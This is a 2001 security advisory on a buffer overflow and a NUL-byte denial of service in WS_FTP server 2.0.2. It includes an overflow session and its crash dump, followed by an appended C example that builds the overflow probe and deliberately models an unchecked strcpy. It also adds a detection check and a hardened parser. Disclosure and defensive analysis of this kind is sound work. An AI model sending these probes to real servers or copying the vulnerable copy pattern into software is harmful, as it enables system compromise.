======================================================================
Defcom Labs Advisory def-2001-28

WS_FTP server 2.0.2 Buffer Overflow and possible DOS

Author: Andreas Junestam <andreasat_private>
Co-Author: Janne Sarendal <janneat_private>
Release Date: 2001-07-26
======================================================================

------------------------=[Brief Description]=-------------------------

WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:

* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD

This buffer overflow gives an attacker the ability to run code on the
target with SYSTEM privileges, because the server runs as a service by
default.

Note: this only applies when logged in as an anonymous user, not as an
ordinary user.

The server also contains an easy-to-trigger DOS.

------------------------=[Affected Systems]=--------------------------

- WS_FTP server 2.0.2; other versions have not been tested.

----------------------=[Detailed Description]=------------------------

* Command Buffer Overrun

All of the commands listed above appear to share the same argument
parsing code, which suffers from a stack buffer overflow. Sending one of
these commands with an argument of at least 478 bytes (474 bytes of
filler followed by a 4-byte return address) overflows the buffer and
overwrites EIP with attacker-controlled bytes; in the register dump
below both EBP and EIP have been replaced with 0x41414141 ("AAAA").
A proof-of-concept exploit is attached to the advisory and works
against WS_FTP server 2.0.2 running on Win2K (Professional and Server,
any SP).

C:\tools\web>nc -nvv 127.0.0.1 21
(UNKNOWN) [127.0.0.1] 21 (?) open
220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
220-Tue Jun 19 14:00:21 2001
220-30 days remaining on evaluation.
220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
user ftp
331 Password required
pass ftp
230 user logged in
DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0
eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246

* Possible DOS

Sending a few NULL (0x00) bytes makes the WS_FTP Server spike to 100%
CPU.

---------------------------=[Workaround]=-----------------------------

Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------

See attached file, ws_ftp.pl

-------------------------=[Vendor Response]=--------------------------

This issue was brought to the vendor's attention on the 18th of June,
2001. A patch has been released.

======================================================================
This release was brought to you by Defcom Labs
labsat_private
www.defcom.com
======================================================================
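The C program below is an added example; it is neither the attached ws_ftp.pl nor Ipswitch's server code. It builds the DELE line the session above sends (474 bytes of filler followed by a 4-byte return address, so 478 bytes reach EIP), models the unbounded-copy bug class that produces the ebp=41414141 / eip=41414141 dump, and shows the two things a defender would want: a sensor check that flags an affected verb with an argument long enough to hit the return address, and a length-aware parser that rejects both the overlong argument and the NUL-laden lines of the DOS instead of spinning on them. The 474/478 offsets and the affected verb list come from the advisory; the 255-byte argument limit, the 64-byte buffer in the model, and all function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define PAD_LEN   474                 /* filler before the saved return address (advisory) */
#define RET_LEN   4                   /* 32-bit return address, seen as eip=41414141 */
#define PROBE_LEN (PAD_LEN + RET_LEN) /* 478: the argument length that reaches EIP */
#define MAX_ARG   255                 /* assumed sane limit for a path argument */

/* Commands the advisory lists as sharing the vulnerable parsing code. */
static const char *const AFFECTED[] = {
    "DELE", "MDTM", "MLST", "MKD", "RMD", "RNFR",
    "RNTO", "SIZE", "STAT", "XMKD", "XRMD", NULL
};

static int is_affected(const char *verb) {
    for (int i = 0; AFFECTED[i] != NULL; i++)
        if (strcmp(verb, AFFECTED[i]) == 0) return 1;
    return 0;
}

/* Build "<cmd> " + 474 x 'A' + 4-byte little-endian ret + CRLF, the line the
 * advisory's session sends.  Returns bytes written, 0 if out is too small. */
size_t build_probe(char *out, size_t cap, const char *cmd, unsigned int ret) {
    size_t vlen = strlen(cmd);
    size_t need = vlen + 1 + PAD_LEN + RET_LEN + 2;
    if (cap < need) return 0;
    char *p = out;
    memcpy(p, cmd, vlen);       p += vlen;
    *p++ = ' ';
    memset(p, 'A', PAD_LEN);    p += PAD_LEN;
    for (int i = 0; i < RET_LEN; i++)            /* x86 stores the address LSB first */
        *p++ = (char)((ret >> (8 * i)) & 0xff);
    *p++ = '\r';
    *p++ = '\n';
    return need;
}

/* Model of the bug class (assumed; not Ipswitch's code, real buffer size unknown):
 * the argument is copied into a fixed stack buffer with no length check, so the
 * bytes past its end overwrite the saved EBP and the return address, which is
 * why the dump shows ebp=41414141 eip=41414141.  Kept for contrast only. */
static void handle_dele_vulnerable(const char *arg) {
    char path[64];
    strcpy(path, arg);                            /* unbounded copy */
    printf("would delete %s\n", path);
}

/* Sensor heuristic on the raw line (NULs allowed): an affected verb whose
 * argument is long enough to reach the return address. */
int looks_like_overflow(const char *line, size_t len) {
    char verb[8];
    size_t v = 0;
    while (v < len && v < sizeof verb - 1 && line[v] != ' ') {
        verb[v] = (char)toupper((unsigned char)line[v]);
        v++;
    }
    verb[v] = '\0';
    if (v == len || line[v] != ' ') return 0;
    size_t alen = len - v - 1;
    if (alen >= 2 && line[len - 2] == '\r' && line[len - 1] == '\n') alen -= 2;
    return is_affected(verb) && alen >= PROBE_LEN;
}

/* Hardened parser: works on an explicit length, so a NUL inside the line is
 * data rather than a terminator.  Returns 0 and fills verb/arg on success,
 * 1 for NUL or other non-printable bytes (reject, do not loop on them),
 * 2 for an argument longer than MAX_ARG, 3 for a malformed line. */
int parse_line(const char *line, size_t len,
               char *verb, size_t vcap, char *arg, size_t acap) {
    if (len < 2 || line[len - 2] != '\r' || line[len - 1] != '\n') return 3;
    len -= 2;
    for (size_t i = 0; i < len; i++)
        if (!isprint((unsigned char)line[i])) return 1;
    size_t v = 0;
    while (v < len && line[v] != ' ') v++;
    if (v == 0 || v >= vcap) return 3;
    for (size_t i = 0; i < v; i++) verb[i] = (char)toupper((unsigned char)line[i]);
    verb[v] = '\0';
    size_t a0 = (v < len) ? v + 1 : len;
    size_t alen = len - a0;
    if (alen > MAX_ARG || alen >= acap) return 2;
    memcpy(arg, line + a0, alen);
    arg[alen] = '\0';
    return 0;
}

int main(void) {
    char probe[600], verb[8], arg[300];
    size_t n = build_probe(probe, sizeof probe, "DELE", 0x41414141u);
    printf("probe: %zu bytes, flagged=%d, parse=%d\n", n,
           looks_like_overflow(probe, n),
           parse_line(probe, n, verb, sizeof verb, arg, sizeof arg));
    handle_dele_vulnerable("foo.txt");           /* safe only because the input is short */
    return 0;
}
```

Two design points: the sensor check runs on the raw byte string with an explicit length, because the DOS trigger is NUL bytes and a strlen-based check would stop at the first one; and the hardened parser rejects before it copies, so the argument never reaches a fixed buffer at all. The 0x41414141 return address reproduces the crash in the advisory; a real exploit would substitute an address of its choosing, which the advisory's attached script does and this example does not.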
This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 08:31:41 PDT